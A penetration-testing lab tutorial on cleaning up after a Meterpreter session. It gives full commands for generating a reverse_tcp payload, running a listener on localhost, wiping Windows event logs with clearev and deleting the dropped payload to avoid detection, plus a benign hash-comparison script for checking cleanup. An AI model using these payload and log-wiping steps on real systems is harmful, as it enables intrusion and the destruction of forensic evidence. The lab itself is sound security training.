Clean Up a System After Engagement using Meterpreter


Introduction

In the field of penetration testing and red teaming, gaining access to a target system is only part of the mission. What you do after gaining access, and just as importantly, before you disconnect, is critical. This phase is known as post-exploitation. A crucial component of post-exploitation is cleanup: the process of removing all traces of your presence from the compromised system.

Leaving behind tools, logs, or system changes can alert system administrators and blue teams to your activities, leading to the failure of the engagement and the patching of the vulnerabilities you used. Meterpreter, a powerful payload within the Metasploit Framework, provides several tools to assist in this cleanup process.

In this lab, you will learn the fundamental steps of cleaning up a system after an engagement using Meterpreter. You will practice gaining a session, clearing event logs, deleting files, and understanding the importance of leaving no trace.

Gain a Meterpreter session on a target

In this step, before we can practice cleaning up a system, we first need to gain access to it. We will simulate this by creating a payload with msfvenom, setting up a listener in the Metasploit Framework, and then "executing" the payload on our own machine to get a Meterpreter session on localhost.

First, open a terminal and use msfvenom to generate a Linux Meterpreter payload. This command will create an executable file named payload.elf in your current directory (~/project).

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf

You should see output indicating the payload was successfully generated:

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf

Next, start the Metasploit Framework console. The -q flag makes it start quietly without showing the banner.

msfconsole -q

Once you are in the msfconsole prompt, you need to configure a listener to catch the connection from the payload. We will use the exploit/multi/handler module.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j

The exploit -j command starts the listener as a background job, so you can still use the console. You will see a message that the handler has started.

Now, open a new terminal tab by clicking the + icon in the terminal window. In this new tab, make the payload executable and run it.

chmod +x ~/project/payload.elf
~/project/payload.elf

Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400

To interact with this new session, use the sessions command.

sessions -i 1

Your prompt should change to meterpreter >, indicating you are now in control of the session.

Use the clearev command to clear event logs

In this step, we will discuss one of the most important cleanup commands in Meterpreter: clearev. A primary goal of cleanup is to remove evidence of your activity from system logs. On Windows systems, these logs (Application, System, and Security) are a prime source of information for forensic investigators.

The clearev command is designed specifically to clear these three main event logs on a Windows target.

Important Note: Our current Meterpreter session is on a Linux system. The clearev command will not work here and will produce an error. We are demonstrating its usage for educational purposes, as it is a critical tool when your target is Windows.

Inside your meterpreter > prompt, type the command to see the result on our Linux session:

meterpreter > clearev

You will see an error message because the command is not implemented for Linux systems.

[-] core_channel_open: Operation failed: The "stdapi_sys_eventlog_open" command is not supported by this session.

However, if you were on a Meterpreter session on a Windows machine, the output would look like this, indicating success:

[*] Wiping 3 records from Application...
[*] Wiping 3 records from System...
[*] Wiping 3 records from Security...

Understanding which tools work on which operating systems is a key skill for a penetration tester. Even though we could not execute it successfully, you now know the primary command for clearing event logs on a Windows target. Two caveats apply when you do use it. First, clearing a Windows event log is itself logged: wiping the Security log writes Event ID 1102 to the Security log, and wiping the Application or System log writes Event ID 104 to the System log, so clearev leaves a very recognisable marker. If the host forwards events to a collector or SIEM, the entries you wiped have already left the machine, so the command removes local evidence rather than making you invisible. Second, on Linux there is no single equivalent; the analogues are the files under /var/log, the wtmp/btmp login records and the shell history of the account you used, and you should record what you touched there rather than assume nothing was written.

Manually delete any uploaded files or tools

In this step, you will learn to manually remove files that you may have uploaded or created on the target system. Automated scripts are useful, but you should always perform a manual check to ensure no tools, scripts, or payloads are left behind.

In our current scenario, the payload.elf file we created in Step 1 is now on the "compromised" system. We must delete it to cover our tracks, and we can do this directly from our Meterpreter session. One detail worth knowing: Linux keeps a deleted file's data on disk for as long as a process still holds it open, so removing payload.elf does not kill the running session. On Windows the running executable is locked, so there you would migrate into another process (or use a second session) before deleting the file.

First, use the ls command within Meterpreter to list the files in the current directory of the target. You should see your payload file.

meterpreter > ls

The output will list the files in /home/labex/project:

Listing: /home/labex/project
============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100755/rwxr-xr-x  240     fil   2023-10-27 10:28:00 -0400  payload.elf
...

Now, use the rm command in Meterpreter to delete the file.

meterpreter > rm payload.elf

You should see a confirmation message:

[*] rm: Removed /home/labex/project/payload.elf

To confirm that the file is gone, run the ls command again. The payload.elf file should no longer be listed. This is a critical step in ensuring you leave the system as you found it.

Revert any system changes made during post-exploitation

In this step, we'll address another aspect of cleanup: reverting system changes. During post-exploitation, you might add user accounts, change file permissions, or create scheduled tasks for persistence. All of these changes must be undone before you leave.

We will simulate this by creating a temporary file to represent a system modification, and then we will remove it.

From your meterpreter > prompt, let's create a file named temp_change.txt. We can do this by using Meterpreter's execute command to run the touch command on the target system.

meterpreter > execute -f touch -a "/home/labex/project/temp_change.txt"

This command executes touch with the argument /home/labex/project/temp_change.txt. You can verify its creation with ls.

meterpreter > ls

Now, as part of our cleanup, we must remove this file. Use the rm command just as you did in the previous step.

meterpreter > rm temp_change.txt

This is a very simple example, but the principle applies to more complex changes. If you added a user, you must delete that user. If you modified a configuration file, you must restore it from a backup or revert the changes manually. Both of those depend on one habit: record every change at the moment you make it (the command, the file and its original contents, the account or task you created), so that at the end there is a definite list to work back through. The changes that get left behind are almost always the ones nobody wrote down.
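The previous two steps (deleting an uploaded tool, restoring a modified file) both come down to the same question: does the target tree now match what it looked like before you touched it? The POSIX shell script below is an added example, not part of this lab or of Metasploit. It takes a sha256sum snapshot of a directory tree before post-exploitation, takes another after cleanup, and reports anything added, changed or missing. The directory, file names and the fake "payload" it drops are constructed for the demo; on a real engagement you would point snapshot at the directories you actually worked in. It assumes coreutils (sha256sum, comm, mktemp) are available.

```shell
#!/bin/sh
# Added example (not part of the original lab or of Metasploit): verify
# cleanup by comparing a baseline snapshot of a directory tree, taken before
# post-exploitation, with a snapshot taken after cleanup.
# All paths, file names and contents below are constructed for the demo.

# snapshot DIR OUT: write one "sha256  ./relative/path" line per regular
# file under DIR into OUT. Output is sorted with LC_ALL=C so two snapshots
# can be compared line by line with comm(1).
snapshot() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort ) > "$2"
}

# check_cleanup BASELINE CURRENT: return 0 when CURRENT matches BASELINE
# exactly; otherwise print what differs and return 1. A file that was
# modified shows up in both lists (new hash in one, old hash in the other).
check_cleanup() {
    added=$(LC_ALL=C comm -13 "$1" "$2")     # lines only in CURRENT
    missing=$(LC_ALL=C comm -23 "$1" "$2")   # lines only in BASELINE
    if [ -z "$added" ] && [ -z "$missing" ]; then
        return 0
    fi
    [ -n "$added" ]   && printf 'LEFT BEHIND / CHANGED:\n%s\n' "$added"
    [ -n "$missing" ] && printf 'MISSING / CHANGED:\n%s\n' "$missing"
    return 1
}

# demo_cleanup: simulate an engagement in a throwaway directory and print
# the verdict before and after cleanup ("dirty clean" when cleanup worked).
demo_cleanup() {
    work=$(mktemp -d)
    mkdir -p "$work/project"
    printf 'listen = 127.0.0.1\n' > "$work/project/app.conf"
    snapshot "$work/project" "$work/before.txt"

    # "post-exploitation": back up a config, then drop a tool and edit it
    cp "$work/project/app.conf" "$work/app.conf.bak"
    printf 'not really an ELF\n' > "$work/project/payload.elf"
    printf 'listen = 0.0.0.0\n' > "$work/project/app.conf"
    snapshot "$work/project" "$work/dirty.txt"
    before=dirty
    check_cleanup "$work/before.txt" "$work/dirty.txt" >/dev/null && before=clean

    # cleanup: remove the tool, restore the config from the backup
    rm "$work/project/payload.elf"
    cp "$work/app.conf.bak" "$work/project/app.conf"
    snapshot "$work/project" "$work/after.txt"
    after=dirty
    check_cleanup "$work/before.txt" "$work/after.txt" >/dev/null && after=clean

    rm -rf "$work"
    printf '%s %s\n' "$before" "$after"
}
```

To use it on a target, source the script and run snapshot against each directory you are about to work in, keep the baseline files off the target, and run check_cleanup before you disconnect. A content hash catches added, deleted and edited files but nothing else: timestamps, ownership, new users, cron entries and services are not in the snapshot, which is why the written change log from the previous step still matters.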

Finally, our cleanup on the target is complete. We can now exit the Meterpreter session and then exit the Metasploit console.

meterpreter > exit
[*] Shutting down Meterpreter...

msf6 exploit(multi/handler) > exit

This will return you to your regular terminal prompt.

Discuss the importance of leaving no trace

This final step is a conceptual review of why cleanup is one of the most critical phases of a professional security engagement. There are no commands to run here; the goal is to understand the strategic importance of what you've just practiced.

Key Reasons for Thorough Cleanup:

  1. Operational Security (OPSEC): The primary goal is to remain undetected. Any artifact you leave behind—a file, a log entry, a running process—is a clue for blue teams and incident responders. Being detected can burn your entire operation, including the tools and infrastructure you used.

  2. Professionalism and Integrity: In a professional penetration test, you are hired to assess security, not to damage the client's systems. Leaving a system in a modified state is unprofessional. Restoring the system to its original state demonstrates care and respect for the client's environment. The same principle cuts the other way for logs: they are the client's records, often needed for compliance and for measuring their own detection, so many rules of engagement forbid wiping them. Confirm what the engagement allows before you run anything like clearev, and document what you removed either way.

  3. Preventing Unintended Damage: Tools or scripts left behind can cause system instability. Worse, a backdoor you created for access could be discovered and used by a malicious actor, making the system less secure than when you started. Your responsibility is to improve security, not create new vulnerabilities.

  4. Maintaining Future Access: In a red team engagement that might span weeks or months, cleaning up after each small action ensures that your long-term access is not discovered prematurely. If you are detected, defenders will patch the vulnerabilities and close the access points you were using.

In summary, effective cleanup is not just about deleting files. It's a mindset that prioritizes stealth, professionalism, and the core mission of the engagement. It separates amateur hackers from professional security testers.

Summary

In this lab, you have walked through the essential process of cleaning up a compromised system using Meterpreter. This is a fundamental skill for any ethical hacker or penetration tester.

You successfully:

  • Gained a Meterpreter session by creating and executing a payload.
  • Learned about the clearev command and its specific use case for clearing event logs on Windows systems.
  • Practiced manually deleting files from a target system using the Meterpreter rm command.
  • Simulated reverting system changes by creating and removing a temporary file.
  • Reflected on the critical importance of cleanup for maintaining operational security and professionalism.

By mastering these techniques, you can ensure your security engagements are not only effective but also responsible, leaving the target environment as you found it and minimizing the risk of detection.